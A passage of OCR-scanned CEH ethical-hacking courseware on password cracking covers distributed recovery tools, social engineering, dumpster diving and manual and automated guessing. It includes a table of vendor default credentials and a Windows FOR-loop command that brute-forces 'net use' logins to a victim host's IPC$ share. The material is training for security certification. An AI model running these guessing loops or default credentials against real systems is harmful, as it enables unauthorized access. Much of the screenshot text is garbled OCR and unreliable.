  • 33. Ethical Hacking and Countermeasures System Hacking Q Exam 312-50 Certified Ethical Hacker C o n tr o ls t h e c lie n ts a n d id e n t if ie s w o r k d o n e b y c lie n ts D N A is d iv id e d i n t o t w o m o d u le s : DNA S erver In te rfa c e T h e D N A s e r v e r i n t e r f a c e a llo w s users t o m a n a g e D N A f r o m a s e rv e r. T h e D N A s e rv e r m o d u l e p r o v id e s t h e u s e r w i t h t h e s ta tu s o f all j o b s t h a t t h e D N A s e r v e r is e x e c u tin g . T his in t e r f a c e is d iv i d e d in t o : Q C u rre n t jo bs: T h e c u r r e n t j o b q u e u e has all t h e j o b s t h a t h a ve b e e n a d d e d t o t h e list by t h e c o n t r o l l e r . T h e c u r r e n t j o b list has m a n y c o lu m n s , such as t h e i d e n t i f i c a t i o n n u m b e r t h a t has b e e n a ssig n e d b y t h e D N A t o t h e j o b , t h e n a m e o f t h e e n c r y p t e d file , t h e p a s s w o r d t h a t has b e e n used b y t h e user, t h e p a s s w o r d t h a t m a tc h e s a ke y w h i c h can u n lo c k d a ta , t h e s ta tu s o f t h e j o b , a n d v a r io u s o t h e r c o lu m n s . © Finished jo b s: T h e f in is h e d j o b list p r o v id e s i n f o r m a t i o n a b o u t t h e j o b s t h a t can be d e c r y p t e d b y in c lu d in g t h e p a s s w o r d . T h e f in is h e d j o b s list also has m a n y c o lu m n s t h a t a re s im ila r t o t h e c u r r e n t j o b list. T he se c o lu m n s in c lu d e t h e i d e n t i f i c a t i o n n u m b e r a ssig n e d by D N A t o t h e j o b , t h e n a m e o f t h e e n c r y p t e d f i l e , t h e d e c r y p t e d p a t h o f t h e file , t h e ke y used t o e n c r y p t a n d d e c r y p t t h e file , t h e d a t e a n d t i m e t h a t t h e D N A s e rv e r s t a r t e d w o r k i n g o n t h e j o b , t h e d a te a n d t i m e t h e D N A s e r v e r f in is h e d w o r k i n g o n t h e j o b , t h e e la p s e d t i m e , e tc. DNA C lie n t In te rfa c e T h e D N A c l i e n t i n t e r f a c e can be used f r o m m a n y w o r k s t a t i o n s . T h e c l i e n t s ta t is t ic s can b e e a sily c o o r d i n a t e d by u sin g t h e D N A c l i e n t in t e r fa c e . T his in t e r f a c e is a v a ila b le o n m a c h in e s w h e r e t h e D N A c l i e n t a p p li c a t i o n has b e e n in s ta lle d . T h e r e a re m a n y c o m p o n e n t s such as t h e n a m e o f t h e D N A c lie n t, t h e n a m e o f t h e g r o u p t o w h i c h t h e D N A c l i e n t b e lo n g s , t h e sta tis tic s a b o u t th e c u r r e n t jo b , and m a n y o th e r c o m p o n e n ts . N etw ork M a n a g e m e n t The N e t w o r k T r a ffic a p p li c a t i o n in W i n d o w s is u sed f o r t h e purpose o f n e tw o rk m a n a g e m e n t . T he N e t w o r k T r a ffic d ia lo g b o x is u sed t o f i n d o u t t h e n e t w o r k s p e e d t h a t D N A uses a n d e a ch w o r k u n i t le n g t h o f t h e D N A c l i e n t . U sing t h e w o r k u n i t le n g t h , a D N A c l i e n t can w o r k w i t h o u t c o n t a c t i n g t h e D N A s e rv e r. T h e D N A c l i e n t a p p li c a t i o n has t h e a b i l it y t o c o n t a c t t h e D N A s e r v e r a t t h e b e g in n in g a nd e n d in g o f t h e w o r k u n i t le n g t h . T h e u s e r can m o n i t o r t h e j o b s ta tu s q u e u e a nd t h e DNA. W h e n t h e d a ta is c o lle c te d f r o m t h e N e t w o r k T r a ffic d ia lo g box, m o d i f i c a t i o n t o t h e c l i e n t w o r k u n i t can be m a d e . W h e n t h e size o f t h e w o r k u n i t le n g t h in c re a se s, t h e s p e e d o f t h e n e t w o r k t r a f f i c d e cre a s e s . If t h e t r a f f i c has been decreased, th e c lie n t w o r k on th e jo b s w o u ld re q u ire a lo n g e r a m o u n t o f tim e . T h e re fo re , f e w e r r e q u e s ts t o t h e s e r v e r can be m a d e d u e t o t h e r e d u c t i o n in t h e b a n d w i d t h o f n e t w o r k tra ffic . Module 05 Page 549 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 34. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker _ Elcom soft D istributed Passw ord Recovery CEH Features: « Distributed password recovery over LAN, Internet, or both « Plug-in architecture allows for additional file formats » Schedule support for flexible load balancing » Install and remove password recovery clients remotely » Encrypted network communications [-!a ■ ■ IkomioA Dttnbut*! P mmokI te ovm >< v * - ‫•׳‬ ►tm 1■ a f 1 ‫ א‬MM<j + < f £ LU Elcomsoft Distributed Password Recovery breaks complex passwords, recovers strong encryption keys, and unlocks documents in a production environment _ n = n _ h ttp ://w w w . elcomsoft. com • ‫י׳יי ״י‬ ‫״־־״״־‬ • ‫"׳ ־‬ Copyright © by E&Coincil. All Rights Reserved. Reproduction isStrictly Prohibited. E lcom soft D istrib u te d P assw o rd R eco v ery S o u rc e : h t t p : / / w w w . e l c o m s o f t . c o m E lc o m s o ft D i s t r i b u t e d stro n g e n c ry p tio n P a s s w o rd R e c o v e r y a llo w s y o u t o b re a k c o m p le x p a s s w o r d s , r e c o v e r keys, a nd u n lo c k d o c u m e n t s in a p r o d u c t i o n e n v i r o n m e n t . It a llo w s t h e e x e c u t i o n o f m a t h e m a t i c a l l y i n t e n s i v e p a s s w o r d r e c o v e r y c o d e o n t h e e n o r m o u s l y p a ra lle l c o m p u t a t i o n a l e le m e n t s f o u n d in m o d e r n g r a p h i c a c c e le r a t o r s . T his e m p lo y s an i n n o v a t i v e t e c h n o l o g y t o a c c e le r a te p a s s w o r d r e c o v e r y w h e n a c o m p a t i b l e ATI o r N V ID IA g r a p h ic s c a rd is p r e s e n t in a d d i t i o n w i t h t h e C P U -o n ly m o d e . W h e n c o m p a r e d w i t h t h e p a s s w o r d r e c o v e r y m e t h o d s t h a t o n l y use t h e c o m p u t e r ' s m a in CPU, t h e GPU a c c e le r a tio n u sed b y t h is t e c h n o l o g y m a k e s p a s s w o r d r e c o v e r y fa s te r . T his s u p p o r t s p a s s w o r d r e c o v e r y o f a v a r i e t y o f a p p li c a t i o n s a n d file f o r m a t s . F ea tu res & B en e fits Q R ed uc e s p a s s w o r d r e c o v e r y t i m e Q D i s t r i b u t e d p a s s w o r d r e c o v e r y o v e r LAN, I n t e r n e t , o r b o t h Q S o lace m a n a g e m e n t f o r f l e x i b l e c o n t r o l f r o m a n y n e t w o r k e d PC © P lu g-in a r c h i t e c t u r e a llo w s f o r a d d it io n a l f ile f o r m a t s Q F le xib le q u e u e c o n t r o l a llo w s easy j o b m a n a g e m e n t Q In sta ll a n d r e m o v e p a s s w o r d r e c o v e r y c lie n ts r e m o t e l y Module 05 Page 550 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 35. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker - L fJ Elcomsoft Distributed Password Rccovcry & £ie fcdrt Apply y!«w ^ £ Agent Server Sr Add Files | Start II 1 h ‫צ‬ V ^ ^ process 0.983 % 1.087 % 0.526% S % .297 0.782 % 0.005% 0.549% filenam e S Testl.&x C Test2.>Jsx S M Test3.rfsx TcsM.xbx & TestS. >lcx 5 Reva.xisx 6 CSoft.&x Files * tjelp X Delete | ^ rena*mg tme (!) Enable (5 Doable dapsed tme 1rwi. lrwv Inn. current speed ~2h. lfimn. 121w. ? Inin. average speed 4S 6 423 219 470 42 ? 263 status recovered recovered recovered recovered notavpted recovered Connection Alerts m Cache And Log , total: 7, not started : 1 paused : 1, wartng : 0, ‫־‬ecovered : S not recovered: 0, net crypted : 1 , Attack object | Result [ C m om ent Character Groups y M utatton ® dictionary v| [Er^lish Prefix /Suffix s M a * 5>m60J: 1 1 l‫ ׳‬l □ abcdei^ttnrwpqrstuv.vxyz □ ABCDffG HJKLM PQ NO RSTLVW XYZ @ 1234567392 □ . • # U + - % ‫־‬a- « 0 0 / 1 <>0 ; : 4.? !‫׳‬ 0 Bask nSoac* ) Length no acttve tasks • onlne tocalmt .!‫|ם‬ Elcomsoft Distributed Password Recovery & Elk Ei dt ‫©י‬ yiew ^ ^ Lq Fls ie * Agents Agent Sre evr x Help , Add F l s ‫ ^ ן‬S a t v' ie tr II ■ | S flnm ieae Q| T s i j s et.dx £g T s 2 x s et.l* GS T * 3 ) s et.dx A Te M i s s.dx GiT s S.xin f et Q Rv.ix eaxs f O B pors rges 0.983% 1.067% 0.S26% 5.297% 0.782% 0.000 % X Odde | 4• 6 Enable ( > Obi * renvanng &ne • «2‫״‬h 1 mn. . 3 • ? dapsed tme l«n. 1-n. I*. 7«n. 1 2m. a/rent speed averagespeed 456 423 219 470 42 ? sau tts rcvrd eoee re o e e cvrd rcvrd eoee paused rcvrd eoee notavpted s Connection AJens m Cache And log t t l 7 n t *Ur t d: 1 C»u9cd :1, r»t1ng:0, r c v r d :5 no«re o e e :0 notcrrp«cd:l oa: , o e , eoee . cvrd , stuck | ojc bet | ReaJt ] Comment mm A n a f v to*s ocrt lchi oaot < orine * FIGURE 5.9: Elcomsoft Distributed Password Recovery Screenshot Module 05 Page 551 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 36. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Non-Electronic Attacks Looking at either the user's keyboard or screen while he/she is logging in Searching for sensitive information at the user's trash-bins, printer trash bins, and user desk for sticky notes Convincing people to reveal the confidential information Copyright © by E&Coincil. All Rights Reserved. Reproduction isStrictly Prohibited. I I N on-E lectronic A ttacks N o n - e l e c t r o n i c a tta c k s a re also t e r m e d d o e s n 't re q u ire any te c h n ic a l k n o w le d g e n o n - t e c h n i c a l a tta c k s . T his k in d o f a t ta c k a b o u t th e m e th o d s o f in tru d in g in to a n o t h e r 's s y s te m . T h e r e f o r e , it is n a m e d a n o n - e l e c t r o n i c a tta c k . T h e r e a re f o u r ty p e s o f n o n - e l e c t r o n i c a tta c k s , w h i c h a re : social e n g in e e r in g , s h o u ld e r s u rfin g , k e y b o a r d s n if fin g , a nd d u m p s t e r d iv in g . |1 ‫ןןןן‬ D u m p ste r D iving D u m p s t e r d iv in g is a k e y a t t a c k m e t h o d t h a t t a r g e t s u p o n a s u b s t a n t i a l f a i l u r e in c o m p u t e r s e c u r it y : t h e v e r y i n f o r m a t i o n t h a t p e o p le c ra ve , p r o t e c t , a n d d e v o t e d l y s e c u re can be a t t a in e d b y a lm o s t a n y o n e w i l l i n g t o s c r u t i n iz e g a r b a g e . It a llo w s y o u t o g a t h e r i n f o r m a t i o n a b o u t t h e t a r g e t 's p a s s w o r d s by l o o k in g t h r o u g h t h e tr a s h . This l o w - t e c h a t t a c k t y p e has m a n y i m p lic a t io n s . D ue t o less s e c u r it y t h a n t h e r e is t o d a y , d u m p s t e r d iv in g w a s a c t u a l ly q u i t e p o p u l a r in t h e 1 980s. T h e t e r m ‫ ״‬d u m p s t e r d iv i n g " r e fe r s t o a n y u s e fu l, g e n e r a l i n f o r m a t i o n t h a t is f o u n d a nd ta ke n fr o m a re as w h e r e it has b e e n d is c a r d e d . T h e se a re a s i n c lu d e tr a s h cans, c u r b s id e c o n t a in e r s , d u m p s t e r s , a n d t h e like, f r o m w h i c h t h e i n f o r m a t i o n can be o b t a i n e d f o r fr e e . C u r io u s a n d / o r m a lic io u s a tt a c k e r s m a y f i n d p a s s w o r d file s , m a n u a ls , s e n s itiv e d o c u m e n t s , r e p o r t s , re c e ip ts , c r e d i t c a rd n u m b e r s , o r d i s k e t t e s t h a t h a ve b e e n t h r o w n a w a y . Module 05 Page 552 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 37. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker S im p ly , t h e e x a m i n a t i o n o f w a s t e p r o d u c t s t h a t h a ve b e e n d u m p e d i n t o t h e d u m p s t e r a re a s m a y be h e l p f u l t o a tta c k e r s , a n d t h e r e is a m p le i n f o r m a t i o n t o s u p p o r t t h is c o n c e p t . Such u s e fu l i n f o r m a t i o n w a s d u m p e d w i t h n o t h o u g h t t o w h o s e h a n d s it m a y e n d u p in. T his d a ta can be u tiliz e d b y t h e a t ta c k e r s t o g a in u n a u t h o r i z e d access o n o t h e r s ' c o m p u t e r s y s te m s , o r t h e o b je c t s f o u n d can p r o m p t o t h e r ty p e s o f a tta c k s such as th o s e based o n so c ia l e n g in e e r in g . T H S h o u ld er Surfing '41 ‫ » — י‬S h o u ld e r ‫׳‬ s u r fin g is w h e n an in tru d e r is s t a n d in g in c o n s p ic u o u s ly , but near a l e g i t i m a t e user, w a t c h i n g as t h e p a s s w o r d is e n t e r e d . T h e a t t a c k e r s i m p l y lo o k s a t e i t h e r t h e u s e r's k e y b o a r d o r s c re e n w h i l e he o r she is lo g g in g in, a n d w a t c h e s t o see if t h e u se r is s ta r in g a t t h e d e s k f o r a p a s s w o r d r e m i n d e r o r t h e a c tu a l p a s s w o r d . T his can be p o s s ib le o n l y w h e n t h e a t t a c k e r is p h y s ic a lly close t o t h e t a r g e t . This t y p e o f a t t a c k can also o c c u r in a g r o c e r y s to r e c h e c k o u t lin e w h e n a p o t e n t i a l v i c t i m is s w i p i n g a d e b i t ca rd a n d e n t e r i n g t h e r e q u i r e d PIN. M a n y o f th e s e P e r s o n a l I d e n t i f i c a t i o n N u m b e r s a re o n l y f o u r d ig its lon g. E a v e s d r o p p i n g r e fe r s t o t h e a c t o f s e c r e tly lis te n in g t o s o m e o n e 's c o n v e r s a t i o n . P a s s w o rd s can be d e t e r m i n e d by s e c r e tly lis te n in g t o t h e p a s s w o r d e x c h a n g e s . If t h e h a c k e r fa ils t o g e t y o u r p a s s w o r d b y g u e ssin g , t h e r e are o t h e r w a y s he o r she can t r y t o g e t it. " P a s s w o r d s n i f f i n g " is an a lt e r n a t i v e used b y t h e h a c k e rs t o g e t t h e i r t a r g e t p a s s w o r d s . M o s t o f t h e n e t w o r k s use b r o a d c a s t t e c h n o l o g y , w h i c h m e a n s t h a t e v e r y m e ssa g e t h a t a c o m p u t e r o n t h e n e t w o r k t r a n s m i t s can be re a d b y e a c h a n d e v e r y c o m p u t e r c o n n e c t e d o n t h a t n e t w o r k . In p r a c tic e , e x c e p t t h e r e c i p i e n t o f t h e m essa ge , all o t h e r c o m p u t e r s w i ll n o tic e t h a t t h e m e s s a g e is n o t i n t e n d e d f o r t h e m , a n d i g n o r e it. H o w e v e r , c o m p u t e r s can be p r o g r a m m e d t o lo o k a t e v e r y m e s s a g e t r a n s m i t t e d by a s p e c ific c o m p u t e r o n t h e n e t w o r k . In t h is w a y , o n e can lo o k a t m essa ge s t h a t a re n o t in t e n d e d f o r t h e m . H a c ke rs h a v e t h e p r o g r a m s t o d o th is , a n d t h e n scan all t h e m essa ge s t r a v e r s e d o n t h e n e tw o rk lo o k in g fo r th e p assw ord. You m a y e n d u p g iv in g y o u r p a s s w o r d t o t h e a t t a c k e r if y o u a re lo g g in g i n t o a c o m p u t e r acro ss a n e tw o rk , and so m e c o m p u te rs on th e n e tw o r k have b een c o m p ro m is e d th is w ay. U sing t h is p a s s w o r d s n i f f i n g t e c h n i q u e , h a c k e rs h a v e c o lle c te d th o u s a n d s o f p a s s w o r d s b y b r e a k in g i n t o t h e c o m p u t e r s t h a t a re c o n n e c t e d o n a h e a v ily u sed n e t w o r k . Social E n g in e e rin g In c o m p u t e r s e c u r ity , social e n g in e e r in g is t h e t e r m t h a t r e p r e s e n ts a n o n - t e c h n i c a l k in d o f i n t r u s io n . T y p ic a lly , t h is re lie s h e a v ily o n h u m a n i n t e r a c t i o n a n d o f t e n in v o lv e s t r i c k in g o t h e r p e o p le i n t o b r e a k in g n o r m a l s e c u r it y p r o c e d u r e s . A social e n g in e e r r u n s a " c o n g a m e " t o b r e a k t h e s e c u r it y p r o c e d u r e s . For e x a m p le , an a t t a c k e r u sin g social e n g in e e r in g t o b r e a k i n t o a c o m p u t e r n e t w o r k w o u l d t r y t o g ain t h e t r u s t o f s o m e o n e w h o is a u t h o r i z e d t o access t h e n e t w o r k , a n d t h e n t r y t o e x t r a c t t h e i n f o r m a t i o n t h a t c o m p r o m i s e s t h e n e t w o r k s e c u r ity . Module 05 Page 553 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 38. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Social e n g in e e r in g is t h e r u n - t h r o u g h o f p r o c u r i n g c o n f i d e n t i a l i n f o r m a t i o n b y d e c e iv in g o r s w a y in g p e o p le . A n a t t a c k e r can m i s r e p r e s e n t h im s e l f as a u s e r o r s y s te m a d m i n i s t r a t o r in o r d e r t o o b t a i n t h e p a s s w o r d f r o m a user. It is n a t u r a l f o r p e o p le t o be h e l p f u l a n d t r u s t i n g . A n y p e r s o n g e n e r a lly m a k e s an e f f o r t t o b u ild a m i c a b l e r e la t io n s h ip s w i t h his o r h e r f r i e n d s a nd c o lle a g u e s . Social e n g in e e r s t a k e a d v a n ta g e o f t h is t e n d e n c y . A n o t h e r t r a i t o f social e n g in e e r in g relie s o n t h e i n a b i l i t y o f p e o p le t o k e e p u p w i t h a c u lt u r e t h a t r e lie s h e a v i l y o n i n f o r m a t i o n t e c h n o l o g y . M o s t p e o p le are n o t a w a r e o f t h e v a lu e o f t h e i n f o r m a t i o n t h e y possess a n d f e w a re ca re le ss a b o u t p r o t e c t i n g it. A t t a c k e r s t a k e a d v a n ta g e o f t h is fa c t fo r th e i n t r u s io n . H a b itu a lly , social e n g in e e r s s e a rch d u m p s te rs fo r v a lu a b le i n f o r m a t i o n . A social e n g in e e r w o u l d h a ve a t o u g h e r t i m e g e t t i n g t h e c o m b i n a t i o n t o a safe, o r e v e n t h e c o m b i n a t i o n t o a h e a lt h c l u b lo c k e r , t h a n a p a s s w o r d . T h e b e s t d e f e n s e is t o e d u c a te , t r a i n , a n d c r e a te a w a re n e s s . K ey b o ard Sniffing I K e y b o a rd s n if fin g a llo w s y o u t o in te rp re t th e p a s s w o r d as t h e t a r g e t e n t e r s t h e k e y s tr o k e s u sin g k e y lo g g e r s . Module 05 Page 554 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 39. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Default Passwords J A default password is a password supplied by the m anufacturer w ith new equipm ent that is password protected Online tools to search default passwords: The Default Password List http://cirt.net http://default-password.info h ttp :/ / w w w .d e fa u ltp a s s w o rd .u s http://www.passwordsdatabase.com https://w3dt.net h t tp :/ / w w w .v iru s .o rg *ccrv.8■***: 000‫ יי‬B 8I *!'Connect * « » wm < doscic < 0000/4007 8 http://open-sez.me http://securityoverride.org • Tot•! % t U ‫ ׳‬i 7.24$ ■NtowlHinib(‫׳‬ : d n * 0 9 a d jrM 2 http://www.routerpasswords.com http://www.fortypoundhead.com http://securityoverride.org Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. ' A D efault P assw o rd s S o u rc e : h t t p : / / s e c u r i t y o v e r r i d e . o r g D e f a u lt p a s s w o r d s a re p a s s w o r d s s u p p lie d b y m a n u f a c t u r e r s w i t h n e w e q u i p m e n t . U s u a lly t h e d e f a u l t p a s s w o r d p r o v id e d by t h e m a n u f a c t u r e r s f o r p a s s w o r d p r o t e c t e d d e v ic e s a llo w s t h e d e v ic e t o be a ccessed d u r in g its in itia l s e tu p . O n l in e t o o l s t h a t can be used t o s e a rch f o r d e f a u l t p a s s w o r d s in c lu d e : 0 h ttp ://c irt.n e t 0 h ttp ://d e fa u lt-p a s s w o rd .in fo 0 h ttp ://w w w .d e fa u ltp a s s w o rd .u s 0 h ttp ://w w w .p a s s w o rd s d a ta b a s e .c o m 0 h ttp s ://w 3 d t.n e t 0 h ttp ://w w w .v iru s .o rg 0 h ttp ://o p e n -s e z .m e 0 h ttp ://s e c u rity o v e rrid e .o rg 0 h ttp ://w w w .ro u te rp a s s w o rd s .c o m 0 h ttp ://w w w .fo rty p o u n d h e a d .c o m Module 05 Page 555 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 40. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker FIGURE 5.10: Default Password Screenshot Access User- Type name 7 0 0 0 /6 0 0 0 /3 5 0 0 /2 5 0 0 Telnet Debug Synnet CoreBuilder 7 0 0 0 /6 0 0 0 /3 5 0 0 /2 5 0 0 Telnet Tech Tech 3COM HiPerARC v4.1.x Telnet Adm (none) 3COM LANplex 2500 Telnet Debug Synnet 3COM LANplex 2500 Telnet Tech Tech 3COM LinkSwitch 2 00 0 /2 7 0 0 Telnet Tech Tech Huawei E960 A dm in A dm in 3COM NetBuilder SNMP N e tbu ild er M u lti A dm in (none) 5x0 Telnet n/a PASSWORD 2200 Telnet debug Synnet 2700 Telnet tech Tech M u lti a d m in ttd a d m in ttd Vendor M odel Version 3COM CoreBuilder 3COM 3COM 3COM 3COM 3COM 3COM Office Connect ISDN Routers SuperStack II Switch SuperStack II Switch OfficeConnect 812 ADSL Password ILMI TABLE 5.1: Online Tools To Search Default Password Module 05 Page 556 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 41. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker M an u al Passw ord C rack in g (G uessing) Frequency of attacks is less r Eu 1 E !! The failure rate is high Create a list of possible passwords Key in each password, until correct password is discovered Rank passwords from high probability to low a I ‫פ‬ Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. M an u al P assw o rd C ra c k in g (G u essin g ) M anual passw ord c r a c k in g encom passes a tte m p tin g to log on w ith d iffe re n t p a s s w o r d s . G u e s sin g is t h e k e y e l e m e n t o f m a n u a l p a s s w o r d c ra c k in g . T h e p a s s w o r d is t h e key v a lu e o f d a ta t h a t is n e e d e d t o access t h e s y s te m . M o s t p a s s w o r d s can be c r a c k e d u sin g d iffe re n t e s c a l a t io n p r iv ile g e s , e x e c u t in g a p p lic a tio n s , h id in g file s, a nd c o v e r in g tra c k s . A t t a c k e r s t r y m a n y a t t e m p t s t o c ra c k p a s s w o r d s t o i n t r u d e i n t o a t a r g e t 's s y s te m . P a s s w o rd s can be c ra c k e d m a n u a l ly o r u sin g s o m e a u t o m a t e d t o o l s , m e t h o d s , a n d a l g o r i t h m s . P a s s w o rd c ra c k in g can be a u t o m a t e d u sin g a s im p le FOR lo o p also. M a n u a l p a s s w o r d c ra c k in g in v o lv e s d i f f e r e n t a t t e m p t s t o log in t h e f o l l o w i n g w a y s : 0 Find a v a lid u se r 0 C re a te a list o f p o s s ib le p a s s w o r d s 0 Rank p a s s w o r d s f r o m h igh p r o b a b i l i t y t o l o w 0 Key in e ach p a s s w o r d , u n til t h e c o r r e c t p a s s w o r d is d is c o v e r e d A h a c k e r can also c r e a te a s c r ip t file t h a t tr ie s e a c h p a s s w o r d in a list. Still t h is is still c o n s id e r e d m a n u a l c ra c k in g . T h e fa i lu r e r a te o f th is t y p e o f a t t a c k is hig h. Module 05 Page 557 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 42. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker M an u a l P assw o rd C ra c k in g A lgorithm In its s i m p l e s t f o r m , p a s s w o r d g u e s s in g can be a u t o m a t e d u sin g a s im p le FOR lo o p . In t h e e x a m p le t h a t f o l lo w s , an a t t a c k e r c r e a te s a s im p le t e x t file w i t h u s e r n a m e s a n d p a s s w o r d s t h a t a re i t e r a t e d u s in g t h e FOR l o o p . T h e m a in FOR lo o p can e x t r a c t t h e u s e r n a m e s a n d p a s s w o r d s f r o m t h e t e x t f i l e t h a t se rv e s as a d i c t i o n a r y as it i t e r a t e s t h r o u g h e v e r y line : [file: credentials.txt] administrator "" administrator password administrator administrator [Etc. ] F ro m a d i r e c t o r y t h a t can access t h e t e x t file , t h e c o m m a n d is t y p e d as f o l lo w s : c:>FOR /F 1tokens=l,2* ‫% ״‬i in (credentials .txt) A 1 More? do net use victim.comlPC$ %j /u:victim.com%iA More? 2 » n u l A More? && echo %time% %date% » outfile.txtA More? && echo Wvictim.com acct: %i pass: %j » outfile.txt c:>type outfile.txt T h e o u t f i l e . t x t c o n t a i n s t h e c o r r e c t u s e r n a m e a nd p a s s w o r d if t h e u s e r n a m e a n d p a s s w o r d in c r e d e n t i a l s . t x t a re c o r r e c t . A n o p e n s e s s io n can be e s ta b lis h e d w i t h t h e v i c t i m s e r v e r u s in g t h e a t t a c k e r 's s y s te m . Module 05 Page 558 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 43. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker _ A utom atic Passw ord C rack in g A lgorithm Find the algorithm used for encryption Create a list of the possible passwords CEH Verify whether there is a match for each user ID Repeat the cycle until the correct password is discovered Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. A utom atic P assw o rd C ra c k in g A lg o rith m As s e c u r it y a w a r e n e s s in c re a s e d , m o s t s y s te m s b e g a n r u n n i n g p a s s w o r d s t h r o u g h s o m e t y p e o f a l g o r i t h m t o g e n e r a t e a hash. This hash is u s u a lly m o r e t h a n j u s t r e a r r a n g in g t h e o rig in a l p a s s w o r d . It is u s u a lly a o n e - w a y h a s h . T h e o n e - w a y hash is a s tr in g o f c h a r a c te r s t h a t c a n n o t b e r e v e rs e d i n t o its o rig in a l te x t . H o w e v e r , t h e v u l n e r a b i l i t y d o e s n o t a ris e f r o m t h e h a s h in g p ro ce ss, b u t f r o m p a s s w o r d s to ra g e . T h e p a s s w o r d t h a t is s to r e d a t t h e t i m e o f a u t h e n t i c a t i o n is n o t d e c r y p t e d b y m o s t o f th e s y s te m s . Such s y s te m s s to r e o n l y o n e - w a y hashes. D u r in g t h e local log in p ro ce ss, t h e p a s s w o r d e n t e r e d is r u n t h r o u g h t h e a l g o r i t h m g e n e r a t in g a o n e - w a y hash a n d c o m p a r i n g i t t o t h e hash s t o r e d o n t h e s y s te m . If t h e y a re f o u n d t o be s im ila r , it is a s s u m e d t h a t t h e p r o p e r p a s s w o r d w a s used. T h e r e f o r e , all t h a t an a t t a c k e r has t o d o in o r d e r t o c ra c k a p a s s w o r d is t o g e t a c o p y o f t h e o n e w a y hash s t o r e d o n t h e s e rv e r, a nd t h e n use t h e a l g o r i t h m t o g e n e r a t e his o r h e r o w n hash u n t i l he o r she g e ts a m a tc h . M o s t s y s t e m s — M i c r o s o f t , UNIX, a n d N e t w a r e — h a ve p u b lic ly a n n o u n c e d t h e i r h a s h in g a l g o r i t h m s . A t t a c k e r s can use a c o m b i n a t i o n o f a t t a c k m e t h o d s t o r e d u c e t h e t i m e in v o lv e d in c r a c k in g a p a s s w o r d . T h e I n t e r n e t p r o v id e s f r e e w a r e p a s s w o r d c r a c k e rs f o r NT, N e t w a r e , a n d UNIX. Module 05 Page 559 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 44. Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker T h e r e a re p a s s w o r d lists t h a t can be fe d t o th e s e c ra c k e rs t o c a r r y o u t a d i c t i o n a r y a t t a c k . In its s i m p l e s t f o r m , a u t o m a t i o n in v o lv e s f i n d i n g a v a lid u s e r a n d t h e p a r t i c u l a r e n c r y p t i o n a l g o r i t h m b e in g used , o b t a i n i n g e n c r y p t e d p a s s w o r d s , c r e a t in g a list o f all p o s s ib le p a s s w o r d s , e n c r y p t i n g e ach w o r d , a n d c h e c k in g f o r a m a t c h f o r e ach u s e r ID k n o w n . T his p ro c e s s is r e p e a t e d u n t i l t h e d e s ire d re s u lts a re o b t a i n e d o r all o p t i o n s a re e x h a u s t e d . A u t o m a t i c p a s s w o r d c r a c k in g a l g o r i t h m s s h o u ld in c lu d e t h e f o l l o w i n g s te p s: e Find a v a lid u se r e Find e n c r y p t i o n a l g o r i t h m used 0 O b t a in e n c r y p t e d p a s s w o r d s Q C re a te a list o f p o s s ib le p a s s w o r d s Q E n c r y p t e ach w o r d © See if t h e r e is a m a tc h f o r e ach u s e r ID P erfo rm in g A u to m ated P assw o rd G u e ssin g If t h e a t t a c k e r fa ils in a m a n u a l a t t a c k , h e o r she can c h o o s e t o a u t o m a t e t h e pro ces s. T h e r e a re s e v e ra l fr e e p r o g r a m s t h a t can assist in t h is e f f o r t . S o m e o f th e s e f r e e p r o g r a m s are Leg io n, Jack t h e R ip p e r, N etB IO S A u d i t i n g T o o l (NAT), e tc . T h e s i m p l e s t o f th e s e a u t o m a t i o n m e t h o d s ta k e a d v a n ta g e o f t h e n e t c o m m a n d . T his in v o lv e s a s im p le l o o p u sin g t h e N T / 2 0 0 0 s h ell f o r c o m m a n d . All t h e a t t a c k e r has t o d o is t o c r e a te a s im p le u s e r n a m e a n d p a s s w o r d file . He o r sh e can t h e n r e f e r e n c e t h i s file w i t h i n a FOR c o m m a n d . C:> FOR /F "token=l, 2*" %i in (credentials.txt) do net use targetlPC$ %i /u: %j A u t o m a t e d p a s s w o r d a tta c k s can be c a te g o r iz e d as f o l lo w s : © A s im p le d ic t io n a r y a t ta c k in v o lv e s lo a d in g a d i c t i o n a r y file (a t e x t file f u ll o f d i c t i o n a r y w o r d s ) i n t o a c ra c k in g a p p li c a t i o n such as L O p h tC ra c k o r J o h n t h e R ip p e r , a n d r u n n i n g 